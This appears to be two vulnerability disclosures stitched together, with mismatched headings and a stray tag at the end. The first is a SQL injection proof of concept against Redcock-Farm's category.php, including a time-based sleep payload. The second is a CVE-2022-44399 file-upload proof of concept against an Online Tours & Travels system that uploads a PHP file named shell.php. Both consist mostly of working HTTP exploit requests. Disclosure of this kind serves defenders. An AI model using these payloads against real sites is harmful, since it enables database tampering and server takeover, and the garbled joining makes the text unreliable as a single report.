GET parameter 'del' exists SQL injection vulnerability

Payload1: /Redcock-Farm/farm/category.php?del=a'

    GET /Redcock-Farm/farm/category.php?del=a' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An error page

Payload2: /Redcock-Farm/farm/category.php?del=a''

    GET /Redcock-Farm/farm/category.php?del=a'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An right page

Payload3: /Redcock-Farm/farm/category.php?del=a'%2b(select\*from(select(sleep(20)))a)%2b'

    GET /Redcock-Farm/farm/category.php?del=a'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

The server response time is 20 seconds

CVE-2022-44399: bug_report/SQLi-1.md at main · tavenli/bug_report

Online Tours & Travels Management System v1.0 contains an arbitrary file upload vulnerability via /tour/admin/file.php.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels management system v1.0 by mayuri\_k has arbitrary file upload**

BUG\_Author: lcg22266

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

Vulnerability url: ip/tour/admin/file.php

Loophole location: Online Tours & Travels management system's /admin/file.php file exists arbitrary file upload

Request package for file upload:

    POST /tour/admin/file.php HTTP/1.1
    Host: localhost
    Content-Length: 320
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryX5YWsfY9nqxrRgu9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/tour/admin/file.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    
    ------WebKitFormBoundaryX5YWsfY9nqxrRgu9
    Content-Disposition: form-data; name="file"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryX5YWsfY9nqxrRgu9
    Content-Disposition: form-data; name="submit"
    
    Upload Image
    ------WebKitFormBoundaryX5YWsfY9nqxrRgu9--
    

The files will be uploaded to this directory tour\\admin\\upload

We visited the directory of the file in the browser and found that the code had been executed

Tag

#apple